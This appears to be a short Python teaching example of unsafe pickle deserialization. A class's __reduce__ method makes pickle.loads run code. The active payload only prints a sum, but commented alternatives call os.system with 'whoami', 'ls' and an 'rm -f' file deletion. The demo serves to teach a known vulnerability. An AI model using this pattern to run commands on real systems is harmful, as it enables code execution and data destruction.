File size: 1,034 Bytes
3db6dda |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
############################################
#example of unsafe de-serialization
import pickle
import os
#1. creating a Evil class which has our malicious payload command (‘whoami’)
class EvilPickle(object):
#def __reduce__(self):
#exec('print("Hello Exec")')
#return os.system, ('ls',)
#return (os.system, ('whoami', ))
def __reduce__(self):
#cmd = ('rm -f h://IDrive/pickle-tests/ex1/test.txt')
#cmd = ('ls -al')
#cmd = (eval('print("Hello Exec")'))
#return os.system, (cmd,)
return exec, ('a = 7\nb = 10\nprint("Sum = ", a + b)', )
#2. serializing the malicious class
pickle_data = pickle.dumps(EvilPickle())
#storing the serialized output into a file in current directory
with open("backup.data", "wb") as file:
file.write(pickle_data)
#3. reading the malicious serialized data and de-serializing it
with open("backup.data", "rb") as file:
pickle_data = file.read()
my_data = pickle.loads(pickle_data)
########################################### |